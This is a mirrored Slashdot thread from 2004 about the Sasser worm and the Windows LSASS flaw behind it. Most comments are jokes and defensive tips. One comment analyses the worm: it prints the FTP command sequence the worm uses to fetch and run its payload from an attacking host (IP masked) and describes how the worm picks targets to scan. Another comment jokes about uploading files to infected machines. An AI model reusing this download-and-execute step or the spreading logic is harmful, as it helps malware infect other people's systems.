Slashdot Mirror

← Back to Stories (view on slashdot.org)

New Windows Worm on the Loose

Posted by michael on from the batten-down-your-ports dept.

Dynamoo writes "The Internet Storm Center has issued a Yellow Alert due to the spread of the Sasser worm exploiting Windows 2000 and XP machines through a documented flaw in the Local Security Authority Subsystem Service (LSASS) as described in Microsoft Bulletin MS04-011. Initial analysis seems to indicate classic Blaster-style worm behaviour. Right now I'm just getting a probe every 10 minutes or so on my firewall, but this is bound to escalate sharply as the pool of infected machines grows. Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you? More information at Computer Associates, F-Secure, Symantec and McAfee."

36 of 622 comments (clear)

  1. ah... by Anonymous Coward · · Score: 5, Funny

    the luxury of being behind a nat box with all ports off and not having to deal with such nonsense

    1. Re:ah... by Interruach · · Score: 5, Funny

      ahh, the luxury of the first box after the NAT being a linux proxy server that serves my entire internal network.

      -- I see your nat box and raise you a proxy server.

    2. Re:ah... by Anonymous Coward · · Score: 5, Insightful
      the luxury of being behind a nat box with all ports off and not having to deal with such nonsense

      Yeah... till your buddy comes over to play Counterstrike and plugs into your hub infecting your machine.

    3. Re:ah... by Lord+Kano · · Score: 5, Funny

      Pussies! I'm whistling into a telephone receiver.

      LK

      --
      "Hi. This is my friend, Jack Shit, and you don't know him." - Lord Kano
    4. Re:ah... by JPriest · · Score: 5, Interesting

      1990, the year someone said it was a bad idea to have default services in listening state.
      1999, the year MS forgot was was said back in 90.
      2003, the year of Microsofts new security initiative.
      2004, the year of the Windows worms.
      XP SP2, the patch for mentioned "listening state" error.

      --
      Saying Java is nice because it works on all OS's is like saying that anal sex is nice because it works on all genders.
  2. I Use X Windows by craXORjack · · Score: 5, Funny
    Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you?

    What is this 'Windows Update' of which you speak?

    --
    Liberals call everyone Nazis yet they are the closest thing to it.
    1. Re:I Use X Windows by temojen · · Score: 5, Funny

      I believe it's a cludgey microsoft variant of

      "emerge sync; emerge -uD --fetchonly world; emerge -uD world; etc-update"

      except that it requires you to reboot several times and repeatedly interact with it.

    2. Re:I Use X Windows by bamf · · Score: 5, Informative

      You've probably already installed it, just look for KB835732 in your list of installed updates.

    3. Re:I Use X Windows by SpectreGadget · · Score: 5, Insightful

      oh yes:

      "emerge sync; emerge -uD --fetchonly world; emerge -uD world; etc-update"

      isn't kludgy in the least and very intuitive. I prefer "apt-get dist-upgrade" myself.

      --
      Jim Harry
    4. Re:I Use X Windows by Anonymous Coward · · Score: 5, Funny
      You must be running a Microsoft Windows operating system in order to use Windows Update.

      Those monopolistic bastards.

    5. Re:I Use X Windows by brunson · · Score: 5, Funny

      It's kinda like:

      yum --ask-lots-of-useless-questions=yes \
      --reboot-for-no-apparent-reason=alot \
      --resolve-dependencies-without-my-help=no \
      update

      --
      09F911029D74E35BD84156C5635688C0
      Jesus loves you, I think you suck
  3. Mutex Trapping by Mr.+Darl+McBride · · Score: 5, Interesting
    About the first thing any Windows program does is to attempt to acquire a mutex to see if the program is already running. In the case of this worm, that's "Jobaka3l." If that exists, the worm dies off without running.

    Mutexes are named consistently enough under Windows that I wish somebody would make a program that simply caught all attempts at gaining a mutex and popped up a dialog window if the mutex hadn't been seen before. This would stop most any new software from running without first checking with the user. This is no good for a server of course, but ideal for a workstation.

    This would also be great for catching spyware crap installs, as well as things like the RealPlayer toolbar that keeps popping up adverts by default. Simply tell the mutex checker to decline the requested mutex from then on and it would have the mutex always fail from then on -- then those programs could never be run again.

    1. Re:Mutex Trapping by Anonymous Coward · · Score: 5, Informative

      You can set permissions in the registry per key.

      Make it impossible to write to HKLM/software/microsoft/windows/currentversion/run

    2. Re:Mutex Trapping by stef0x77 · · Score: 5, Informative

      Use regedt32.exe (which is an older incarnation of regedit), go to the key in question, choose Security | Permissions ... from the menu etc...

    3. Re:Mutex Trapping by kyhwana · · Score: 5, Informative

      Err, Startup Monitor does just that.
      Well, it doesn't protect the registry, but it does pop up a dialog box whenever something tries to add itself to those registry entries..

      --
      My email addy? should be easy enough.
    4. Re:Mutex Trapping by Foolhardy · · Score: 5, Informative

      You can also enable auditing that will record attempts to access keys you want to watch in the same dialog (see Advanced->Auditing). But first, you have to enable the auditing policy: in the control panel, go to Administrative Tools->Local Security Policy. Then Local Policies->Audit Policy. Registry keys are considered objects.
      Access attempts will show up in the event viewer.
      Note:use regedt32.exe for Win2000 or eariler. For later versions, regedit.exe does everything (under Edit->Permissions).

  4. Huh? by grub · · Score: 5, Funny

    A new worm?
    May 01 07:59:49.306654 rule 0/0(match): block in on dc0: xx.xx.xx.xx:xxxx > yy.yy.yy.yy:yyyy: S 2881286568:2881286568(0) win 32640 (DF)
    Oh, there it is.
    --
    Trolling is a art,
  5. Removal Instructions by modifried · · Score: 5, Informative

    For anyone already infected, Microsoft has manual removal instructions for the worm, located here:

    http://www.microsoft.com/security/incident/sasser. asp

  6. ah Nice, more work =) by Quazion · · Score: 5, Funny

    Atleast for me as the local consumer support guy.

    Thanks Microsoft.

  7. HAHA by D-Cypell · · Score: 5, Funny

    A smile crept across my face after reading this story and then noticing a microsoft ad underneath informing the reader that Windows Server cost of ownership is lower than Linux cost of ownership!

    The add server must be based on Microsoft's new Irony.NET framework!

    1. Re:HAHA by Lothsahn · · Score: 5, Insightful

      Actually, current viruses are real malware, especially the ones that try to shut down virus scanners.

      They cause the computer to run really slow, and screw things up, including networking settings, killing IE, destroy the cryptography service, so that you can't get updates, and the ability to repair the TCP/IP layer.

      When you get multiple viruses on a machine, they can cause it to not even startup--Especially the ones that try to shut down virus scanners (Gaobot).

      I know they're not malware in the sense that they format your HD or anything, but when your server runs at 10% of it's normal speed, that's enough to take down almost any operation.

      --
      -=Lothsahn=-
    2. Re:HAHA by Anonymous Coward · · Score: 5, Funny

      but the fact is windows server cost of ownership IS lower because you don't need a smart person to run it.

      And that, your honour, concludes my evidence showing why the Internet is such an insecure mess.

  8. Visit Windows Update? by Anonymous Coward · · Score: 5, Funny

    No need, I receive all the Windows critical updates by email. I don't know how I got subscribed to that mailing list, but it's damn convenient.

  9. Security Update Dates by TheUnFounded · · Score: 5, Insightful

    You know, normally these updates are available a good 3 or 4 months before the worm becomes available. This one was updated about 3 days ago. And MS claims to be beefing up their security efforts. ...

  10. YA Windows-only software title by Anonymous Coward · · Score: 5, Funny

    In light of this, would someone please explain why I would ever want a Mac? None of the really good viruses or worms are ever ported to it, no matter how successful they are!

  11. Loose not lose by Brian+Dennehy · · Score: 5, Funny

    I'm impressed that they got the headline right!

  12. How it works by mrneutron · · Score: 5, Informative
    It infects a 2000 or XP box via the LSASS (MS04-011) exploit, and opens a shell on port 9996.

    It then connects to that shell, and executes the following commands (cleaned up to get past slasdot's junk filter):

    open XXX.XXX.XXX.XXX 5554

    anonymous

    user

    bin

    get XXXXX_up.exe

    bye

    XXXXX_up.exe

    If successful, those commands ftp to the attacking host, port 5554, and download the actual worm payload. That payload is executed, and the host is fully infected. It then opens an FTP port on port 5554, and begins scanning for vulnerable hosts. Here's the scanning logic, from symantec:

    The IP addresses generated by the worm are distributed as follows:

    50% are completely random

    25% have the same first octet as the IP

    address of the infected host

    25% have the same first and second octet as the IP address of the infected host.

    The worm starts 128 threads that scan randomly-chosen IP addresses. This demands a lot of CPU time and as a result an infected computer may be so slow as to be barely useable.

    See:

    • http://securityresponse.symantec.com/avcenter/ve nc/data/w32.sasser.worm.html
  13. Help the poor bastards by nazsco · · Score: 5, Funny

    The worm seems to install a ftp server on infected machines. So, wouldn't it be nice to have every box that detects a connection on port 554, reply with an upload of a new wallpaper to the infected windows box with some message like "install a firewall, moron"

    I consider it a public service. Maybe you can even deduct the bandwith for the upload from you tax.

  14. Days like this... by C0rinthian · · Score: 5, Funny

    I REALLY hate working dial-up tech support.
    (ring)
    sigh....

  15. Windows update freaking out! by nazsco · · Score: 5, Funny

    after reading this on the /. front page, i runned the windows update, that i don't visit for more than a year...

    and after some time, a windows pops up with the text:
    "The software you are instaling has not passed the Windows Logo testing to verify its compatibility with Windows XP. bla bla bla"
    "This software will *not be instaled*. Contact your system administrator."

    Ok, so i contact myself, and wonders what the hell?!?

    I just give M$ a lot of information about the operating system that i'm running... they wrote the frign thing, and even so, they don't know what will run in it, or what will pass their own crap compatibility verification!

    but well, that's it... i just click "OK" --the only button-- and see the same windows appears 3 times more... and blissfuly keep my ignorance of what's going on with the instalation.

  16. You must be an american by empaler · · Score: 5, Funny

    Only consumer whores and other types of idiots choose to toss out the computer instead of just wiping the hard drive and installing something else.

  17. Well done, submitter! by 6Yankee · · Score: 5, Funny

    How refreshing. A Slashdot article about a worm exploiting Windows, without the usual childish jibes. Or FUD. Or spelling mistakes. Well done, Dynamoo!

    Of course, then came the comments... :-)

  18. I was wondering... by lazy_arabica · · Score: 5, Funny

    ... if we replaced the posts of this thread with the messages posted after a previous worm-announcement, would anyone notice ? :)

    Linux_Zealot says : 5 Insightful - I am using Linux now !
    M$_wizard : 5 Interesting - Worms always appear after a security notice from Microsoft Knowledge Base ; so, openness is bad !
    security_Teacher : 5 Insightful - Of course, no one should run anything as root but cricital administration tasks, and a firewall is essential.
    n00b : -1 Troll - Windows Sucks !!!

    Well... That's just a little... repetitive ;-)

    1. Re:I was wondering... by kasperd · · Score: 5, Interesting

      a firewall is essential.

      It sure is. The last worm wouldn't have worked without one.

      --

      Do you care about the security of your wireless mouse?
  19. This totally sucks. by mark-t · · Score: 5, Interesting
    I was never in any danger of being infected by this worm, but about 3 days ago, I noticed I was getting almost a steady stream of traffic on my lan when nobody was using any computers... A quick check with ethereal showed that it was all port 445 stuff, and I was getting as many as 10 packets every second coming from various IP addresses.

    So for the past few days, I've had to live with part of my bandwidth getting chewed up by incoming packets that don't actually do anything but take up space. It effectively slowed the speed of downloads by about half. The rate of packets is starting to slow down now... finally (I guess as people patch their systems), but it still was highly annoying.

    Anyways, I called my ISP when I first noticed it 3 days ago (after checking it with ethereal), and asked if they could help. They told me that this was caused by filesharing programs, which I knew wasn't the case becuase in fact the only port 445 stuff I've done is windows filesharing, and I've secured the one and only Windows system on my LAN against IP addresses other than other ones on my LAN from being able to access them. Needless to say, this answer did not impress me. Here I was, effectively being subjected to a DoS attack, and they are trying to tell me this is _my_ fault? Man, if I had any other choice for high speed internet, I'd be switching in a heartbeat.

    Anyways, that's my story. Things like this totally bite because you can have a firewall and all the security precautions in the world, but worms like this still chew up your bandwidth.

    --
    File under 'M' for 'Manic ranting'
  20. Re:Removal Instructions [mirrors] by AvantLegion · · Score: 5, Funny
    Here's a few mirrors for those removal instructions, in case the rash of post-bug traffic slows things down:

    http://fedora.redhat.com
    http://www.gentoo.org
    http://www.debian.org
    http://www.linux-mandrake.com
    http://www.slackware.com